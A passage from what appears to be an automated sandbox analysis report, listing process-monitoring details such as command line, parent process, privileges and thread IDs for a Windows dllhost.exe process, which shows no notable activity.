| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1280
|
Process #204: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #204 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:04:23, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x11e0 |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
10C0
0x
EB8
|
